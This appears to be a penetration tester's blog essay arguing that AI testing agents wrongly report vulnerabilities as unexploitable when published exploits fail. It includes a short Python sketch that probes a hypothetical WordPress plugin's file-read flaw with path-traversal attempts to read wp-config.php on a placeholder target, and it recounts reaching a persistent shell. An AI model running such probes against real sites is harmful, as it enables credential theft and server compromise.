There's a risk building quietly in the security industry, and it's not what most people expect.
It's not that AI-driven testing tools miss vulnerabilities. They're actually quite good at finding them... often faster than a human ever would. The problem is what happens after the finding.
An AI agent identifies a vulnerability. It pulls down the public PoC. It fires the default payloads, walks the known paths, tries the documented attack chain. And when those don't land, it draws a conclusion: not exploitable in this environment.
That conclusion can be dead wrong.
On a recent engagement, two high-severity WordPress plugin vulnerabilities came up. Chained together, they give you unauthenticated remote code execution. The CVSS scores reflect it. Any scanner or automated agent would flag them immediately, and they did.
But the public exploit code didn't work.
Paths were wrong. Server behaviour didn't match what the PoC author had in front of them when they wrote it. Execution was unreliable. The environment just wasn't cooperating with the assumptions baked into the published chain.
This is the point where automation tends to hit a wall.
The agent tries the known chain. It fails. There's no creative leap that says "what if path resolution works differently here?" or "what if I pull config data through the file read first and rebuild the approach from what I find?"
It just moves on.
And what ends up in the report is something along the lines of:
High-severity vulnerability identified. Not exploitable in this environment.
That's not validation. That's assumption dressed up as assurance.
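To make that failure mode concrete, here's a deliberately simplified sketch of the decision logic being described. It isn't any particular tool's code; the function and result type are made up for illustration. The shape of the reasoning is the point: one replay of the published chain, then a confident verdict either way.

```python
from dataclasses import dataclass
from typing import Callable

@dataclass
class PocResult:
    success: bool

def automated_verdict(run_stock_poc: Callable[[str], PocResult], target: str) -> str:
    """One replay of the published chain, then a confident verdict."""
    result = run_stock_poc(target)  # default payloads, documented paths, no adaptation
    if result.success:
        return "High-severity vulnerability identified. Exploitable."
    # The leap this article is about: a failed replay of someone else's PoC
    # reported back as evidence of safety.
    return "High-severity vulnerability identified. Not exploitable in this environment."
```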
Getting from "known CVE" to a working compromise on this engagement wasn't a matter of clicking run. It took:
The published exploit was a starting point. Nothing more.
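For a flavour of what that adaptation looks like, the sketch below shows the kind of step a stock replay never takes: using the arbitrary file read as reconnaissance, learning how the target is actually laid out, and only then rebuilding the rest of the chain. The endpoint, parameters and candidate paths here are hypothetical stand-ins, not the actual plugin from the engagement.

```python
import requests

TARGET = "https://victim.example"                  # placeholder target
FILE_READ_ENDPOINT = "/wp-admin/admin-ajax.php"    # hypothetical vulnerable endpoint

def read_file(path: str) -> str | None:
    """Fetch a file through the (hypothetical) arbitrary file read."""
    resp = requests.get(
        TARGET + FILE_READ_ENDPOINT,
        params={"action": "plugin_download", "file": path},  # illustrative parameters only
        timeout=10,
    )
    return resp.text if resp.status_code == 200 else None

# A stock PoC hard-codes one path and gives up when it fails. Adapting means
# treating the file read as reconnaissance: find wp-config.php, learn the
# credentials, secrets and which traversal depth actually works, then rebuild
# the execution step around that instead of the PoC author's assumptions.
candidate_paths = [
    "../wp-config.php",
    "../../wp-config.php",
    "../../../wp-config.php",
    "/var/www/html/wp-config.php",
]

for path in candidate_paths:
    content = read_file(path)
    if content and "DB_NAME" in content:
        print(f"[+] wp-config.php readable via {path} -- rebuild the chain from here")
        break
else:
    print("[-] no luck yet; that means keep adapting, not 'not exploitable'")
```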
Eventually the chain came together. Controlled command execution landed. A persistent shell followed. And the scope of the conversation shifted entirely, from a vulnerable plugin to full server compromise and lateral risk.
Missing a vulnerability is bad. Misclassifying one is worse.
The scenario that keeps me up at night is this: an automated tool finds a critical issue, tries the stock exploit, fails because of some environmental quirk, and then confidently tells the client it can't be exploited.
To a decision-maker reading that report, the message is clear:
Yes, the vulnerability exists. Yes, it's rated critical. But it doesn't actually work here. Move on.
Except it does work. It just needed more effort than a templated attack chain.
That gap between "didn't work automatically" and "not exploitable" is where real risk lives. It produces a clean-looking report while the exposure underneath remains completely unaddressed.
AI is good at scale. It's good at coverage. It's very good at flagging known issues across large environments quickly.
But real-world exploitation rarely lives in clean, documented territory. It sits in the grey area between a published vulnerability, an environment that doesn't quite match, partial success with a known technique, and the manual adaptation needed to close the gap.
That space still belongs to human testers. Because exploitation isn't about running a script as published; it's about understanding the intent behind the technique, reshaping it to fit what's actually in front of you, and persisting through the parts that don't work on the first pass.
That kind of thinking is hard to template.
AI-driven testing has a legitimate place. It widens visibility and accelerates discovery in ways that are genuinely useful.
But when it becomes a replacement for human-led penetration testing rather than a complement, the risk isn't just missed findings. It's misplaced confidence.
A report that says "not exploitable" carries weight. It influences remediation priorities. It can push a critical fix to the back of the queue. It shapes how organisations think about their exposure.
If that judgement is built on nothing more than whether a stock exploit ran successfully, it's not a finding. It's a guess.
And in the wrong environment, that guess is exactly what an attacker is counting on.